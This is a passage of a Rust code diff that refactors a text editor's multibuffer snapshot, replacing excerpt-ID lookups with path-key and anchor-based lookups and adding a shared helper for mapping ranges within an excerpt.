BD>(&'a self) -> MultiBufferCursor<'a, MBD, BD> @@ -6046,35 +5373,17 @@ impl MultiBufferSnapshot { MultiBufferCursor { excerpts, diff_transforms, - diffs: &self.diffs, cached_region: OnceCell::new(), + snapshot: self, } } - pub fn excerpt_before(&self, excerpt_id: ExcerptId) -> Option> { - let start_locator = 
self.excerpt_locator_for_id(excerpt_id); - let mut excerpts = self - .excerpts - .cursor::, ExcerptOffset>>(()); - excerpts.seek(&Some(start_locator), Bias::Left); + pub fn excerpt_before(&self, anchor: Anchor) -> Option> { + let target = anchor.try_seek_target(&self)?; + let mut excerpts = self.excerpts.cursor::(()); + excerpts.seek(&target, Bias::Left); excerpts.prev(); - - let mut diff_transforms = self - .diff_transforms - .cursor::>(()); - diff_transforms.seek(&excerpts.start().1, Bias::Left); - if diff_transforms.end().excerpt_dimension < excerpts.start().1 { - diff_transforms.next(); - } - - let excerpt = excerpts.item()?; - Some(MultiBufferExcerpt { - excerpt, - offset: diff_transforms.start().output_dimension.0, - buffer_offset: BufferOffset(excerpt.range.context.start.to_offset(&excerpt.buffer)), - excerpt_offset: excerpts.start().1, - diff_transforms, - }) + Some(excerpts.item()?.range.clone()) } pub fn excerpt_boundaries_in_range( @@ -6119,7 +5428,7 @@ impl MultiBufferSnapshot { } else { cursor.seek_to_start_of_current_excerpt(); } - let mut prev_region = cursor + let mut prev_excerpt = cursor .fetch_excerpt_with_range() .map(|(excerpt, _)| excerpt); @@ -6134,7 +5443,7 @@ impl MultiBufferSnapshot { let (next_excerpt, next_range) = cursor.fetch_excerpt_with_range()?; cursor.next_excerpt_forwards(); if !bounds.contains(&next_range.start.key) { - prev_region = Some(next_excerpt); + prev_excerpt = Some(next_excerpt); continue; } @@ -6145,18 +5454,20 @@ impl MultiBufferSnapshot { self.max_point() }; - let prev = prev_region.as_ref().map(|region| ExcerptInfo { - id: region.id, - buffer: region.buffer.clone(), - buffer_id: region.buffer_id, - range: region.range.clone(), + let prev = prev_excerpt.as_ref().map(|excerpt| ExcerptBoundaryInfo { + start_anchor: Anchor::in_buffer( + excerpt.path_key_index, + excerpt.range.context.start, + ), + range: excerpt.range.clone(), end_row: MultiBufferRow(next_region_start.row), }); - let next = ExcerptInfo { - id: 
next_excerpt.id, - buffer: next_excerpt.buffer.clone(), - buffer_id: next_excerpt.buffer_id, + let next = ExcerptBoundaryInfo { + start_anchor: Anchor::in_buffer( + next_excerpt.path_key_index, + next_excerpt.range.context.start, + ), range: next_excerpt.range.clone(), end_row: if next_excerpt.has_trailing_newline { MultiBufferRow(next_region_end.row - 1) @@ -6167,7 +5478,7 @@ impl MultiBufferSnapshot { let row = MultiBufferRow(next_region_start.row); - prev_region = Some(next_excerpt); + prev_excerpt = Some(next_excerpt); return Some(ExcerptBoundary { row, prev, next }); } @@ -6182,13 +5493,98 @@ impl MultiBufferSnapshot { self.non_text_state_update_count } - /// Returns the smallest enclosing bracket ranges containing the given range or - /// None if no brackets contain range or the range is not contained in a single - /// excerpt + /// Allows converting several ranges within the same excerpt between buffer offsets and multibuffer offsets. /// - /// Can optionally pass a range_filter to filter the ranges of brackets to consider - #[ztracing::instrument(skip_all)] - pub fn innermost_enclosing_bracket_ranges( + /// If the input range is contained in a single excerpt, invokes the callback with the full range of that excerpt + /// and the input range both converted to buffer coordinates. The buffer ranges returned by the callback are lifted back + /// to multibuffer offsets and returned. + /// + /// Returns `None` if the input range spans multiple excerpts. 
+ pub fn map_excerpt_ranges<'a, T>( + &'a self, + position: Range, + f: impl FnOnce( + &'a BufferSnapshot, + ExcerptRange, + Range, + ) -> Vec<(Range, T)>, + ) -> Option, T)>> { + let mut cursor = self.cursor::(); + cursor.seek(&position.start); + + let region = cursor.region()?; + if !region.is_main_buffer { + return None; + } + let excerpt = cursor.excerpt()?; + let excerpt_start = *cursor.excerpts.start(); + let input_buffer_start = cursor.buffer_position_at(&position.start)?; + + cursor.seek_forward(&position.end); + if cursor.excerpt()? != excerpt { + return None; + } + let region = cursor.region()?; + if !region.is_main_buffer { + return None; + } + let input_buffer_end = cursor.buffer_position_at(&position.end)?; + let input_buffer_range = input_buffer_start..input_buffer_end; + let buffer = excerpt.buffer_snapshot(self); + let excerpt_context_range = excerpt.range.context.to_offset(buffer); + let excerpt_context_range = + BufferOffset(excerpt_context_range.start)..BufferOffset(excerpt_context_range.end); + let excerpt_primary_range = excerpt.range.primary.to_offset(buffer); + let excerpt_primary_range = + BufferOffset(excerpt_primary_range.start)..BufferOffset(excerpt_primary_range.end); + let results = f( + buffer, + ExcerptRange { + context: excerpt_context_range.clone(), + primary: excerpt_primary_range, + }, + input_buffer_range, + ); + let mut diff_transforms = cursor.diff_transforms; + Some( + results + .into_iter() + .map(|(buffer_range, metadata)| { + let clamped_start = buffer_range + .start + .max(excerpt_context_range.start) + .min(excerpt_context_range.end); + let clamped_end = buffer_range + .end + .max(clamped_start) + .min(excerpt_context_range.end); + let excerpt_offset_start = + excerpt_start + (clamped_start.0 - excerpt_context_range.start.0); + let excerpt_offset_end = + excerpt_start + (clamped_end.0 - excerpt_context_range.start.0); + + diff_transforms.seek(&excerpt_offset_start, Bias::Right); + let mut output_start = 
diff_transforms.start().output_dimension; + output_start += + excerpt_offset_start - diff_transforms.start().excerpt_dimension; + + diff_transforms.seek_forward(&excerpt_offset_end, Bias::Right); + let mut output_end = diff_transforms.start().output_dimension; + output_end += excerpt_offset_end - diff_transforms.start().excerpt_dimension; + + (output_start.0..output_end.0, metadata) + }) + .collect(), + ) + } + + /// Returns the smallest enclosing bracket ranges containing the given range or + /// None if no brackets contain range or the range is not contained in a single + /// excerpt + /// + /// Can optionally pass a range_filter to filter the ranges of brackets to consider + #[ztracing::instrument(skip_all)] + pub fn innermost_enclosing_bracket_ranges( &self, range: Range, range_filter: Option< @@ -6196,32 +5592,31 @@ impl MultiBufferSnapshot { >, ) -> Option<(Range, Range)> { let range = range.start.to_offset(self)..range.end.to_offset(self); - let mut excerpt = self.excerpt_containing(range.clone())?; - let buffer = excerpt.buffer(); - let excerpt_buffer_range = excerpt.buffer_range(); - - // Filter to ranges contained in the excerpt - let range_filter = |open: Range, close: Range| -> bool { - excerpt_buffer_range.contains(&BufferOffset(open.start)) - && excerpt_buffer_range.contains(&BufferOffset(close.end)) - && range_filter.is_none_or(|filter| { - filter( - buffer, - BufferOffset(open.start)..BufferOffset(close.end), - BufferOffset(close.start)..BufferOffset(close.end), - ) - }) - }; - - let (open, close) = excerpt.buffer().innermost_enclosing_bracket_ranges( - excerpt.map_range_to_buffer(range), - Some(&range_filter), - )?; - - Some(( - excerpt.map_range_from_buffer(BufferOffset(open.start)..BufferOffset(open.end)), - excerpt.map_range_from_buffer(BufferOffset(close.start)..BufferOffset(close.end)), - )) + let results = + self.map_excerpt_ranges(range, |buffer, excerpt_range, input_buffer_range| { + let filter = |open: Range, close: Range| -> bool { + 
excerpt_range.context.start.0 <= open.start + && close.end <= excerpt_range.context.end.0 + && range_filter.is_none_or(|filter| { + filter( + buffer, + BufferOffset(open.start)..BufferOffset(close.end), + BufferOffset(close.start)..BufferOffset(close.end), + ) + }) + }; + let Some((open, close)) = + buffer.innermost_enclosing_bracket_ranges(input_buffer_range, Some(&filter)) + else { + return Vec::new(); + }; + vec![ + (BufferOffset(open.start)..BufferOffset(open.end), ()), + (BufferOffset(close.start)..BufferOffset(close.end), ()), + ] + })?; + let [(open, _), (close, _)] = results.try_into().ok()?; + Some((open, close)) } /// Returns enclosing bracket ranges containing the given range or returns None if the range is @@ -6229,30 +5624,33 @@ impl MultiBufferSnapshot { pub fn enclosing_bracket_ranges( &self, range: Range, - ) -> Option, Range)> + '_> - { + ) -> Option, Range)>> { let range = range.start.to_offset(self)..range.end.to_offset(self); - let mut excerpt = self.excerpt_containing(range.clone())?; - - Some( - excerpt - .buffer() - .enclosing_bracket_ranges(excerpt.map_range_to_buffer(range)) - .filter_map(move |pair| { - let open_range = - BufferOffset(pair.open_range.start)..BufferOffset(pair.open_range.end); - let close_range = - BufferOffset(pair.close_range.start)..BufferOffset(pair.close_range.end); - if excerpt.contains_buffer_range(open_range.start..close_range.end) { - Some(( - excerpt.map_range_from_buffer(open_range), - excerpt.map_range_from_buffer(close_range), - )) - } else { - None - } - }), - ) + let results = + self.map_excerpt_ranges(range, |buffer, excerpt_range, input_buffer_range| { + buffer + .enclosing_bracket_ranges(input_buffer_range) + .filter(|pair| { + excerpt_range.context.start.0 <= pair.open_range.start + && pair.close_range.end <= excerpt_range.context.end.0 + }) + .flat_map(|pair| { + [ + ( + BufferOffset(pair.open_range.start) + ..BufferOffset(pair.open_range.end), + (), + ), + ( + BufferOffset(pair.close_range.start) + 
..BufferOffset(pair.close_range.end), + (), + ), + ] + }) + .collect() + })?; + Some(results.into_iter().map(|(range, _)| range).tuples()) } /// Returns enclosing bracket ranges containing the given range or returns None if the range is @@ -6263,54 +5661,55 @@ impl MultiBufferSnapshot { options: TreeSitterOptions, ) -> impl Iterator, TextObject)> + '_ { let range = range.start.to_offset(self)..range.end.to_offset(self); - self.excerpt_containing(range.clone()) - .map(|mut excerpt| { - excerpt - .buffer() - .text_object_ranges(excerpt.map_range_to_buffer(range), options) - .filter_map(move |(range, text_object)| { - let range = BufferOffset(range.start)..BufferOffset(range.end); - if excerpt.contains_buffer_range(range.clone()) { - Some((excerpt.map_range_from_buffer(range), text_object)) - } else { - None - } - }) - }) - .into_iter() - .flatten() + self.map_excerpt_ranges(range, |buffer, excerpt_range, input_buffer_range| { + buffer + .text_object_ranges(input_buffer_range, options) + .filter(|(range, _)| { + excerpt_range.context.start.0 <= range.start + && range.end <= excerpt_range.context.end.0 + }) + .map(|(range, text_object)| { + ( + BufferOffset(range.start)..BufferOffset(range.end), + text_object, + ) + }) + .collect() + }) + .into_iter() + .flatten() } - /// Returns bracket range pairs overlapping the given `range` or returns None if the `range` is - /// not contained in a single excerpt pub fn bracket_ranges( &self, range: Range, - ) -> Option, Range)> + '_> - { + ) -> Option, Range)>> { let range = range.start.to_offset(self)..range.end.to_offset(self); - let mut excerpt = self.excerpt_containing(range.clone())?; - Some( - excerpt - .buffer() - .bracket_ranges(excerpt.map_range_to_buffer(range)) - .filter_map(move |pair| { - let open_range = - BufferOffset(pair.open_range.start)..BufferOffset(pair.open_range.end); - let close_range = - BufferOffset(pair.close_range.start)..BufferOffset(pair.close_range.end); - excerpt - 
.contains_buffer_range(open_range.start..close_range.end) - .then(|| BracketMatch { - open_range: excerpt.map_range_from_buffer(open_range), - close_range: excerpt.map_range_from_buffer(close_range), - color_index: pair.color_index, - newline_only: pair.newline_only, - syntax_layer_depth: pair.syntax_layer_depth, - }) - }) - .map(BracketMatch::bracket_ranges), - ) + let results = + self.map_excerpt_ranges(range, |buffer, excerpt_range, input_buffer_range| { + buffer + .bracket_ranges(input_buffer_range) + .filter(|pair| { + excerpt_range.context.start.0 <= pair.open_range.start + && pair.close_range.end <= excerpt_range.context.end.0 + }) + .flat_map(|pair| { + [ + ( + BufferOffset(pair.open_range.start) + ..BufferOffset(pair.open_range.end), + (), + ), + ( + BufferOffset(pair.close_range.start) + ..BufferOffset(pair.close_range.end), + (), + ), + ] + }) + .collect() + })?; + Some(results.into_iter().map(|(range, _)| range).tuples()) } pub fn redacted_ranges<'a, T: ToOffset>( @@ -6332,7 +5731,7 @@ impl MultiBufferSnapshot { pub fn runnable_ranges( &self, range: Range, - ) -> impl Iterator, language::RunnableRange)> + '_ { + ) -> impl Iterator, language::RunnableRange)> + '_ { let range = range.start.to_offset(self)..range.end.to_offset(self); self.lift_buffer_metadata(range, move |buffer, range| { Some( @@ -6345,7 +5744,12 @@ impl MultiBufferSnapshot { .map(|runnable| (runnable.run_range.clone(), runnable)), ) }) - .map(|(run_range, runnable, _)| (run_range, runnable)) + .map(|(run_range, runnable, _)| { + ( + self.anchor_after(run_range.start)..self.anchor_before(run_range.end), + runnable, + ) + }) } pub fn line_indents( @@ -6358,7 +5762,7 @@ impl MultiBufferSnapshot { cursor.seek(&Point::new(start_row.0, 0)); iter::from_fn(move || { let mut region = cursor.region()?; - while !buffer_filter(®ion.excerpt.buffer) { + while !buffer_filter(®ion.excerpt.buffer_snapshot(self)) { cursor.next(); region = cursor.region()?; } @@ -6380,11 +5784,11 @@ impl 
MultiBufferSnapshot { .line_indents_in_row_range(buffer_start_row..buffer_end_row); let region_buffer_row = region.buffer_range.start.row; let region_row = region.range.start.row; - let region_buffer = ®ion.excerpt.buffer; + let region_buffer = region.excerpt.buffer_snapshot(self); cursor.next(); Some(line_indents.map(move |(buffer_row, indent)| { let row = region_row + (buffer_row - region_buffer_row); - (MultiBufferRow(row), indent, region_buffer.as_ref()) + (MultiBufferRow(row), indent, region_buffer) })) }) .flatten() @@ -6400,7 +5804,7 @@ impl MultiBufferSnapshot { cursor.seek(&Point::new(end_row.0, 0)); iter::from_fn(move || { let mut region = cursor.region()?; - while !buffer_filter(®ion.excerpt.buffer) { + while !buffer_filter(®ion.excerpt.buffer_snapshot(self)) { cursor.prev(); region = cursor.region()?; } @@ -6424,11 +5828,11 @@ impl MultiBufferSnapshot { .reversed_line_indents_in_row_range(buffer_start_row..buffer_end_row); let region_buffer_row = region.buffer_range.start.row; let region_row = region.range.start.row; - let region_buffer = ®ion.excerpt.buffer; + let region_buffer = region.excerpt.buffer_snapshot(self); cursor.prev(); Some(line_indents.map(move |(buffer_row, indent)| { let row = region_row + (buffer_row - region_buffer_row); - (MultiBufferRow(row), indent, region_buffer.as_ref()) + (MultiBufferRow(row), indent, region_buffer) })) }) .flatten() @@ -6579,8 +5983,7 @@ impl MultiBufferSnapshot { let end_row = MultiBufferRow(range.end.row); let mut row_indents = self.line_indents(start_row, |buffer| { - let settings = - language_settings(buffer.language().map(|l| l.name()), buffer.file(), cx); + let settings = LanguageSettings::for_buffer_snapshot(buffer, None, cx); settings.indent_guides.enabled || ignore_disabled_for_language }); @@ -6604,7 +6007,7 @@ impl MultiBufferSnapshot { .get_or_insert_with(|| { ( buffer.remote_id(), - language_settings(buffer.language().map(|l| l.name()), buffer.file(), cx), + 
LanguageSettings::for_buffer_snapshot(buffer, None, cx), ) }) .1; @@ -6699,14 +6102,8 @@ impl MultiBufferSnapshot { fn language_settings<'a>(&'a self, cx: &'a App) -> Cow<'a, LanguageSettings> { self.excerpts .first() - .map(|excerpt| &excerpt.buffer) - .map(|buffer| { - language_settings( - buffer.language().map(|language| language.name()), - buffer.file(), - cx, - ) - }) + .map(|excerpt| excerpt.buffer_snapshot(self)) + .map(|buffer| LanguageSettings::for_buffer_snapshot(buffer, None, cx)) .unwrap_or_else(move || self.language_settings_at(MultiBufferOffset::ZERO, cx)) } @@ -6715,13 +6112,11 @@ impl MultiBufferSnapshot { point: T, cx: &'a App, ) -> Cow<'a, LanguageSettings> { - let mut language = None; - let mut file = None; if let Some((buffer, offset)) = self.point_to_buffer_offset(point) { - language = buffer.language_at(offset); - file = buffer.file(); + buffer.settings_at(offset, cx) + } else { + Cow::Borrowed(&AllLanguageSettings::get_global(cx).defaults) } - language_settings(language.map(|l| l.name()), file, cx) } pub fn language_scope_at(&self, point: T) -> Option { @@ -6759,7 +6154,7 @@ impl MultiBufferSnapshot { pub fn has_diagnostics(&self) -> bool { self.excerpts .iter() - .any(|excerpt| excerpt.buffer.has_diagnostics()) + .any(|excerpt| excerpt.buffer_snapshot(self).has_diagnostics()) } pub fn diagnostic_group( @@ -6838,7 +6233,12 @@ impl MultiBufferSnapshot { .map(|entry| (entry.range, entry.diagnostic)), ) }) - .map(|(range, diagnostic, b)| (b.buffer_id, DiagnosticEntryRef { diagnostic, range })) + .map(|(range, diagnostic, excerpt)| { + ( + excerpt.buffer_snapshot(self).remote_id(), + DiagnosticEntryRef { diagnostic, range }, + ) + }) } pub fn syntax_ancestor( @@ -6846,41 +6246,52 @@ impl MultiBufferSnapshot { range: Range, ) -> Option<(tree_sitter::Node<'_>, Range)> { let range = range.start.to_offset(self)..range.end.to_offset(self); - let mut excerpt = self.excerpt_containing(range.clone())?; - let node = excerpt - .buffer() - 
.syntax_ancestor(excerpt.map_range_to_buffer(range))?; - let node_range = node.byte_range(); - let node_range = BufferOffset(node_range.start)..BufferOffset(node_range.end); - if !excerpt.contains_buffer_range(node_range.clone()) { - return None; - }; - Some((node, excerpt.map_range_from_buffer(node_range))) + let results = + self.map_excerpt_ranges(range, |buffer, excerpt_range, input_buffer_range| { + let Some(node) = buffer.syntax_ancestor(input_buffer_range) else { + return vec![]; + }; + let node_range = node.byte_range(); + if excerpt_range.context.start.0 <= node_range.start + && node_range.end <= excerpt_range.context.end.0 + { + vec![( + BufferOffset(node_range.start)..BufferOffset(node_range.end), + node, + )] + } else { + vec![] + } + })?; + let (output_range, node) = results.into_iter().next()?; + Some((node, output_range)) } pub fn outline(&self, theme: Option<&SyntaxTheme>) -> Option> { - let (excerpt_id, _, buffer) = self.as_singleton()?; - let outline = buffer.outline(theme); + let buffer_snapshot = self.as_singleton()?; + let excerpt = self.excerpts.first()?; + let path_key_index = excerpt.path_key_index; + let outline = buffer_snapshot.outline(theme); Some(Outline::new( outline .items .into_iter() - .flat_map(|item| { - Some(OutlineItem { - depth: item.depth, - range: self.anchor_range_in_excerpt(excerpt_id, item.range)?, - source_range_for_text: self - .anchor_range_in_excerpt(excerpt_id, item.source_range_for_text)?, - text: item.text, - highlight_ranges: item.highlight_ranges, - name_ranges: item.name_ranges, - body_range: item.body_range.and_then(|body_range| { - self.anchor_range_in_excerpt(excerpt_id, body_range) - }), - annotation_range: item.annotation_range.and_then(|annotation_range| { - self.anchor_range_in_excerpt(excerpt_id, annotation_range) - }), - }) + .map(|item| OutlineItem { + depth: item.depth, + range: Anchor::range_in_buffer(path_key_index, item.range), + source_range_for_text: Anchor::range_in_buffer( + path_key_index, + 
item.source_range_for_text, + ), + text: item.text, + highlight_ranges: item.highlight_ranges, + name_ranges: item.name_ranges, + body_range: item + .body_range + .map(|body_range| Anchor::range_in_buffer(path_key_index, body_range)), + annotation_range: item.annotation_range.map(|annotation_range| { + Anchor::range_in_buffer(path_key_index, annotation_range) + }), }) .collect(), )) @@ -6892,173 +6303,90 @@ impl MultiBufferSnapshot { theme: Option<&SyntaxTheme>, ) -> Option<(BufferId, Vec>)> { let anchor = self.anchor_before(offset); - let excerpt @ &Excerpt { - id: excerpt_id, - buffer_id, - ref buffer, - .. - } = self.excerpt(anchor.excerpt_id)?; - if cfg!(debug_assertions) { - match anchor.text_anchor.buffer_id { - // we clearly are hitting this according to sentry, but in what situations can this occur? - Some(anchor_buffer_id) => { - assert_eq!( - anchor_buffer_id, buffer_id, - "anchor {anchor:?} does not match with resolved excerpt {excerpt:?}" - ) - } - None => assert!(anchor.is_max()), - } - }; + let target = anchor.try_seek_target(&self)?; + let (_, _, excerpt) = self.excerpts.find((), &target, Bias::Left); + let excerpt = excerpt?; + let buffer_snapshot = excerpt.buffer_snapshot(self); Some(( - buffer_id, - buffer - .symbols_containing(anchor.text_anchor, theme) + buffer_snapshot.remote_id(), + buffer_snapshot + .symbols_containing( + anchor + .excerpt_anchor() + .map(|anchor| anchor.text_anchor()) + .unwrap_or(text::Anchor::min_for_buffer(buffer_snapshot.remote_id())), + theme, + ) .into_iter() .flat_map(|item| { Some(OutlineItem { depth: item.depth, source_range_for_text: Anchor::range_in_buffer( - excerpt_id, + excerpt.path_key_index, item.source_range_for_text, ), - range: Anchor::range_in_buffer(excerpt_id, item.range), + range: Anchor::range_in_buffer(excerpt.path_key_index, item.range), text: item.text, highlight_ranges: item.highlight_ranges, name_ranges: item.name_ranges, - body_range: item - .body_range - .map(|body_range| 
Anchor::range_in_buffer(excerpt_id, body_range)), - annotation_range: item - .annotation_range - .map(|body_range| Anchor::range_in_buffer(excerpt_id, body_range)), + body_range: item.body_range.map(|body_range| { + Anchor::range_in_buffer(excerpt.path_key_index, body_range) + }), + annotation_range: item.annotation_range.map(|body_range| { + Anchor::range_in_buffer(excerpt.path_key_index, body_range) + }), }) }) .collect(), )) } - fn excerpt_locator_for_id(&self, id: ExcerptId) -> &Locator { - self.try_excerpt_locator_for_id(id) - .unwrap_or_else(|| panic!("invalid excerpt id {id:?}")) + pub fn buffer_for_path(&self, path: &PathKey) -> Option<&BufferSnapshot> { + let (_, _, excerpt) = self + .excerpts + .find::((), path, Bias::Left); + Some(excerpt?.buffer_snapshot(self)) } - fn try_excerpt_locator_for_id(&self, id: ExcerptId) -> Option<&Locator> { - if id == ExcerptId::min() { - Some(Locator::min_ref()) - } else if id == ExcerptId::max() { - Some(Locator::max_ref()) - } else { - let (_, _, item) = self.excerpt_ids.find::((), &id, Bias::Left); - if let Some(entry) = item - && entry.id == id - { - return Some(&entry.locator); - } - None - } + pub fn path_for_buffer(&self, buffer_id: BufferId) -> Option<&PathKey> { + Some(&self.buffers.get(&buffer_id)?.path_key) } - /// Returns the locators referenced by the given excerpt IDs, sorted by locator. 
- fn excerpt_locators_for_ids( - &self, - ids: impl IntoIterator, - ) -> SmallVec<[Locator; 1]> { - let mut sorted_ids = ids.into_iter().collect::>(); - sorted_ids.sort_unstable(); - sorted_ids.dedup(); - let mut locators = SmallVec::new(); - - while sorted_ids.last() == Some(&ExcerptId::max()) { - sorted_ids.pop(); - locators.push(Locator::max()); - } - - let mut sorted_ids = sorted_ids.into_iter().peekable(); - locators.extend( - sorted_ids - .peeking_take_while(|excerpt| *excerpt == ExcerptId::min()) - .map(|_| Locator::min()), - ); - - let mut cursor = self.excerpt_ids.cursor::(()); - for id in sorted_ids { - if cursor.seek_forward(&id, Bias::Left) { - locators.push(cursor.item().unwrap().locator.clone()); - } else { - panic!("invalid excerpt id {:?}", id); - } - } + pub(crate) fn path_key_index_for_buffer(&self, buffer_id: BufferId) -> Option { + let snapshot = self.buffers.get(&buffer_id)?; + Some(snapshot.path_key_index) + } - locators.sort_unstable(); - locators + fn first_excerpt_for_buffer(&self, buffer_id: BufferId) -> Option<&Excerpt> { + let path_key = &self.buffers.get(&buffer_id)?.path_key; + self.first_excerpt_for_path(path_key) } - pub fn buffer_id_for_excerpt(&self, excerpt_id: ExcerptId) -> Option { - Some(self.excerpt(excerpt_id)?.buffer_id) + fn first_excerpt_for_path(&self, path_key: &PathKey) -> Option<&Excerpt> { + let (_, _, first_excerpt) = + self.excerpts + .find::((), path_key, Bias::Left); + first_excerpt } - pub fn buffer_for_excerpt(&self, excerpt_id: ExcerptId) -> Option<&BufferSnapshot> { - Some(&self.excerpt(excerpt_id)?.buffer) + pub fn buffer_for_id(&self, id: BufferId) -> Option<&BufferSnapshot> { + self.buffers.get(&id).map(|state| &state.buffer_snapshot) } - pub fn range_for_excerpt(&self, excerpt_id: ExcerptId) -> Option> { - let mut cursor = self - .excerpts - .cursor::, ExcerptPoint>>(()); - let locator = self.excerpt_locator_for_id(excerpt_id); - let mut sought_exact = cursor.seek(&Some(locator), Bias::Left); - if 
cursor.item().is_none() && excerpt_id == ExcerptId::max() { - sought_exact = true; - cursor.prev(); - } else if excerpt_id == ExcerptId::min() { - sought_exact = true; - } - if sought_exact { - let start = cursor.start().1; - let end = cursor.end().1; - let mut diff_transforms = self - .diff_transforms - .cursor::>>(()); - diff_transforms.seek(&start, Bias::Left); - let overshoot = start - diff_transforms.start().0; - let start = diff_transforms.start().1 + overshoot; - diff_transforms.seek(&end, Bias::Right); - let overshoot = end - diff_transforms.start().0; - let end = diff_transforms.start().1 + overshoot; - Some(start.0..end.0) - } else { - None - } + fn try_path_for_anchor(&self, anchor: ExcerptAnchor) -> Option { + self.path_keys_by_index.get(&anchor.path).cloned() } - /// Returns the excerpt for the given id. The returned excerpt is guaranteed - /// to have the latest excerpt id for the one passed in and will also remap - /// `ExcerptId::max()` to the corresponding excertp ID. - /// - /// Callers of this function should generally use the resulting excerpt's `id` field - /// afterwards. 
- fn excerpt(&self, excerpt_id: ExcerptId) -> Option<&Excerpt> { - let excerpt_id = self.latest_excerpt_id(excerpt_id); - let locator = self.try_excerpt_locator_for_id(excerpt_id)?; - let (_, _, item) = - self.excerpts - .find::, _>((), &Some(locator), Bias::Left); - if let Some(excerpt) = item - && excerpt.id == excerpt_id - { - return Some(excerpt); - } else if item.is_none() && excerpt_id == ExcerptId::max() { - return self.excerpts.last(); - } - None + pub fn path_for_anchor(&self, anchor: ExcerptAnchor) -> PathKey { + self.try_path_for_anchor(anchor) + .expect("invalid anchor: path was never added to multibuffer") } /// Returns the excerpt containing range and its offset start within the multibuffer or none if `range` spans multiple excerpts pub fn excerpt_containing( &self, range: Range, - ) -> Option> { + ) -> Option<(&BufferSnapshot, ExcerptRange)> { let range = range.start.to_offset(self)..range.end.to_offset(self); let mut cursor = self.cursor::(); cursor.seek(&range.start); @@ -7066,31 +6394,15 @@ impl MultiBufferSnapshot { let start_excerpt = cursor.excerpt()?; if range.end != range.start { cursor.seek_forward(&range.end); - if cursor.excerpt()?.id != start_excerpt.id { + if cursor.excerpt()? 
!= start_excerpt { return None; } } - cursor.seek_to_start_of_current_excerpt(); - let region = cursor.region()?; - let offset = region.range.start; - let buffer_offset = start_excerpt.buffer_start_offset(); - let excerpt_offset = *cursor.excerpts.start(); - Some(MultiBufferExcerpt { - diff_transforms: cursor.diff_transforms, - excerpt: start_excerpt, - offset, - buffer_offset, - excerpt_offset, - }) - } - - pub fn buffer_id_for_anchor(&self, anchor: Anchor) -> Option { - if let Some(id) = anchor.text_anchor.buffer_id { - return Some(id); - } - let excerpt = self.excerpt_containing(anchor..anchor)?; - Some(excerpt.buffer_id()) + Some(( + start_excerpt.buffer_snapshot(self), + start_excerpt.range.clone(), + )) } pub fn selections_in_range<'a>( @@ -7099,27 +6411,34 @@ impl MultiBufferSnapshot { include_local: bool, ) -> impl 'a + Iterator)> { let mut cursor = self.excerpts.cursor::(()); - let start_locator = self.excerpt_locator_for_id(range.start.excerpt_id); - let end_locator = self.excerpt_locator_for_id(range.end.excerpt_id); - cursor.seek(start_locator, Bias::Left); + cursor.seek(&range.start.seek_target(self), Bias::Left); cursor - .take_while(move |excerpt| excerpt.locator <= *end_locator) + .take_while(move |excerpt| { + let excerpt_start = + Anchor::in_buffer(excerpt.path_key_index, excerpt.range.context.start); + excerpt_start.cmp(&range.end, self).is_le() + }) .flat_map(move |excerpt| { + let buffer_snapshot = excerpt.buffer_snapshot(self); let mut query_range = excerpt.range.context.start..excerpt.range.context.end; - if excerpt.id == range.start.excerpt_id { - query_range.start = range.start.text_anchor; + if let Some(excerpt_anchor) = range.start.excerpt_anchor() + && excerpt.contains(&excerpt_anchor, self) + { + query_range.start = excerpt_anchor.text_anchor(); } - if excerpt.id == range.end.excerpt_id { - query_range.end = range.end.text_anchor; + if let Some(excerpt_anchor) = range.end.excerpt_anchor() + && excerpt.contains(&excerpt_anchor, self) + { 
+ query_range.end = excerpt_anchor.text_anchor(); } - excerpt - .buffer + buffer_snapshot .selections_in_range(query_range, include_local) .flat_map(move |(replica_id, line_mode, cursor_shape, selections)| { selections.map(move |selection| { - let mut start = Anchor::in_buffer(excerpt.id, selection.start); - let mut end = Anchor::in_buffer(excerpt.id, selection.end); + let mut start = + Anchor::in_buffer(excerpt.path_key_index, selection.start); + let mut end = Anchor::in_buffer(excerpt.path_key_index, selection.end); if range.start.cmp(&start, self).is_gt() { start = range.start; } @@ -7149,7 +6468,16 @@ impl MultiBufferSnapshot { } pub fn diff_for_buffer_id(&self, buffer_id: BufferId) -> Option<&BufferDiffSnapshot> { - self.diffs.get(&buffer_id).map(|diff| &diff.diff) + self.diff_state(buffer_id).map(|diff| &diff.diff) + } + + fn diff_state(&self, buffer_id: BufferId) -> Option<&DiffStateSnapshot> { + find_diff_state(&self.diffs, buffer_id) + } + + pub fn total_changed_lines(&self) -> (u32, u32) { + let summary = self.diffs.summary(); + (summary.added_rows, summary.removed_rows) } pub fn all_diff_hunks_expanded(&self) -> bool { @@ -7183,10 +6511,11 @@ impl MultiBufferSnapshot { .to_multi_buffer_debug_ranges(self) .into_iter() .flat_map(|range| { - self.range_to_buffer_ranges(range.start..=range.end) + self.range_to_buffer_ranges(range) .into_iter() - .map(|(buffer, range, _excerpt_id)| { - buffer.anchor_after(range.start)..buffer.anchor_before(range.end) + .map(|(buffer_snapshot, range, _)| { + buffer_snapshot.anchor_after(range.start) + ..buffer_snapshot.anchor_before(range.end) }) }) .collect(); @@ -7197,42 +6526,218 @@ impl MultiBufferSnapshot { fn excerpt_edits_for_diff_change( &self, - buffer_state: &BufferState, + path: &PathKey, diff_change_range: Range, ) -> Vec>> { let mut excerpt_edits = Vec::new(); - for locator in &buffer_state.excerpts { - let mut cursor = self - .excerpts - .cursor::, ExcerptOffset>>(()); - cursor.seek_forward(&Some(locator), 
Bias::Left); - if let Some(excerpt) = cursor.item() - && excerpt.locator == *locator + let mut cursor = self.excerpts.cursor::(()); + cursor.seek(path, Bias::Left); + while let Some(excerpt) = cursor.item() + && &excerpt.path_key == path + { + let buffer_snapshot = excerpt.buffer_snapshot(self); + let excerpt_buffer_range = excerpt.range.context.to_offset(buffer_snapshot); + let excerpt_start = cursor.start().clone(); + let excerpt_len = excerpt.text_summary.len; + cursor.next(); + if diff_change_range.end < excerpt_buffer_range.start + || diff_change_range.start > excerpt_buffer_range.end { - let excerpt_buffer_range = excerpt.range.context.to_offset(&excerpt.buffer); - if diff_change_range.end < excerpt_buffer_range.start - || diff_change_range.start > excerpt_buffer_range.end - { - continue; - } - let excerpt_start = cursor.start().1; - let excerpt_len = excerpt.text_summary.len; - let diff_change_start_in_excerpt = diff_change_range - .start - .saturating_sub(excerpt_buffer_range.start); - let diff_change_end_in_excerpt = diff_change_range - .end - .saturating_sub(excerpt_buffer_range.start); - let edit_start = excerpt_start + diff_change_start_in_excerpt.min(excerpt_len); - let edit_end = excerpt_start 